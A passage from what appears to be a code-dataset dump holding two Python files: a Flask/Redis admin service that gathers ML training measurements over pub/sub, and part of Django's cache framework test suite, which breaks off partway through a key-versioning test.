source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
admin.py
|
#!/usr/bin/env python
import json
import threading
import time
from datetime import datetime
import pandas as pd
import redis
from flask import Flask
from flask_cors import CORS
from flask_restful import Api, Resource
import util
from train import TrainCenter
from util.config import config
from util.log import log
from util.singleton import SingletonMixin
app = Flask(__name__)
CORS(app)
api = Api(app)
LOOP_INTERVAL_SEC = 5
class LogCollector(SingletonMixin):
def __init__(self):
super(LogCollector, self).__init__()
info = config['pubsub']
self.host = info[0]
self.port = int(info[1])
self.r = redis.StrictRedis(host=self.host, port=self.port, db=0)
self.p = self.r.pubsub()
self.p.psubscribe('*')
def collect(self):
# TODO: get message from pub/sub server
while True:
raw_message = self.p.get_message()
if not raw_message:
break
# log.warn('raw_message: %s' % raw_message)
self._handle(raw_message)
def _handle(self, raw_message):
data = util.extract_json2(raw_message)
if data is None or 'key' not in data:
return
key = data['key']
# if key == 'START_ML_WORKER':
# worker_id = data['worker_id']
# Center().connect_ml_worker(worker_id)
# elif key == 'START_ML_TRAIN':
# worker_id = data['worker_id']
# code_name = data['code_name']
# train_id = data['train_id']
# Center().start_train(worker_id, code_name, train_id)
# elif key == 'FINISH_ML_TRAIN':
# worker_id = data['worker_id']
# code_name = data['code_name']
# train_id = data['train_id']
# Center().finish_train(worker_id, code_name, train_id)
# elif key == 'REGISTER_TRAIN':
# Center().register_train(data)
if key == 'UPDATE_PS':
Center().update_ps(data)
elif key == 'UPDATE_PS_DETAIL':
Center().update_ps_detail(data)
elif key == 'MEASUREMENT':
Center().update_measurement(data)
elif key == 'TRAIN_NOW':
TrainCenter().train_now(data)
elif key == 'set_variable':
pass
elif key == 'average':
pass
else:
log.error('IMPME: %s' % key)
def start_sub_log_and_command():
log.warn('START THREAD: admin / subscribe log and command')
while True:
LogCollector().collect()
# time.sleep(0.001)
Center().loop_count += 1
time.sleep(LOOP_INTERVAL_SEC)
def start_train_center():
log.warn('START THREAD: admin / train-center')
while True:
TrainCenter().update()
time.sleep(LOOP_INTERVAL_SEC)
class MeasureContainer(object):
def __init__(self):
self.train_ids = set([])
self.group_ids = set([])
self.ps_dict = {} # group_id: { worker_id: data }
self.controller_dict = {} # group_id: data
self.df = pd.DataFrame(
columns=[
'train_id', 'group_id', 'worker_id', 'parallel_count',
'load_rtt', 'save_rtt', 'controller_rtt',
'data_size', 'success', 'cal',
],
dtype='float')
def _to_list(self, data):
load_end = int(data['num_01_after_load_variables'])
load_start = int(data['num_01_before_load_variables'])
load_rtt = load_end - load_start
save_end = int(data['num_02_after_save_variables'])
save_start = int(data['num_02_before_save_variables'])
save_rtt = save_end - save_start
controller_rtt = int(data['num_05_after_pub_on_controller']) - int(
data['num_03_after_get_on_controller'])
cal = int(data['cal'])
success = 1
return [
data['train_id'],
data['group_id'],
data['worker_id'],
data['parallel_count'],
load_rtt,
save_rtt,
controller_rtt,
data['data_size'],
success,
cal,
]
def update(self, data):
node_type = data['node_type']
group_id = data['group_id']
if node_type == 'ps':
self._update_ps(group_id, data)
else:
self._update_controller(group_id, data)
def get_stat_of_train(self):
d = json.loads(self.get_train_stat_json())
d2 = json.loads(
self.df.groupby(['train_id'])['group_id'].count().to_json(
orient='index'))
for k, v in d.iteritems():
v['count'] = d2[k]
return d
def get_train_stat_json(self):
df = self.df
return df.groupby(['train_id']).mean().to_json(orient='index')
def get_group_stat_json(self):
df = self.df
return df.groupby(['group_id']).mean().to_json(orient='index')
def _update_ps(self, group_id, raw):
worker_id = raw['worker_id']
raw['merged'] = False
if group_id in self.controller_dict:
controller_data = self.controller_dict[group_id]
merged_data = self._merge(raw, controller_data)
self._append(merged_data)
else:
d = self.ps_dict
if group_id not in d:
d[group_id] = {}
group = d[group_id]
group[worker_id] = raw
def _merge(self, ps_data, controller_data):
return util.merge_two_dicts(ps_data, controller_data)
def _append(self, merged_data):
l = self._to_list(merged_data)
df = self.df
df.loc[len(df)] = l
def _update_controller(self, group_id, data):
self.controller_dict[group_id] = data
psd = self.ps_dict
if group_id in psd:
group_dict = psd[group_id]
for ps in group_dict.itervalues():
merged_data = self._merge(ps, data)
self._append(merged_data)
del psd[group_id]
class Center(SingletonMixin):
def __init__(self):
super(Center, self).__init__()
self.loop_count = 0
self.ml_worker = {}
self.ps = {}
self.ps_detail = []
self.measure_container = MeasureContainer()
# def start_train(self, worker_id, code_name, train_id):
# msg = 'Start (%s:%s)' % (code_name, train_id)
# w = self.ml_worker[worker_id]
# w['description'] = msg
# def finish_train(self, worker_id, code_name, train_id):
# msg = 'Finish (%s:%s)' % (code_name, train_id)
# w = self.ml_worker[worker_id]
# w['description'] = msg
# def connect_ml_worker(self, worker_id):
# self.ml_worker[worker_id] = {
# 'worker_id': worker_id,
# 'description': 'connected',
# }
def update_ps_detail(self, data):
group_id = data['group_id']
msg = data['msg']
worker_id = data['worker_id']
now = datetime.now()
now_str = now.strftime('%H:%M:%S.%f')
self.ps_detail.append({
'group_id': group_id,
'worker_id': worker_id,
'msg': msg,
'time': now_str})
def update_ps(self, data):
v = data['value']
group_id = v['group_id']
self.ps[group_id] = v
def update_measurement(self, data):
self.measure_container.update(data)
def get_data(self):
return {
'loop_count': self.loop_count,
'train': TrainCenter().get_info(),
'worker': [v for k, v in self.ml_worker.iteritems()],
'ps': [v for k, v in self.ps.iteritems()],
'ps_detail': self.ps_detail,
'stat_of_group': json.loads(
self.measure_container.get_group_stat_json()),
'stat_of_train': self.measure_container.get_stat_of_train(),
}
class DefaultRoute(Resource):
def get(self):
return Center().get_data()
api.add_resource(DefaultRoute, '/')
def run():
t1 = threading.Thread(target=start_sub_log_and_command)
t1.daemon = True
t1.start()
t2 = threading.Thread(target=start_train_center)
t2.daemon = True
t2.start()
admin_config = config['admin']
app.run(host='0.0.0.0', port=int(admin_config['port']), debug=False)
# app.run(port=int(admin_config['port']), debug=True)
if __name__ == '__main__':
run()
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.delete_many({'key with spaces': 'foo'})
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
time.sleep(3)
self.assertFalse(cache.has_key('expire1'))
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Followe memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
cache.touch('key5', timeout=None)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
cache.touch('key5', timeout=0)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with self.assertWarnsMessage(CacheKeyWarning, expected_warning):
cache.set(key, 'value')
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
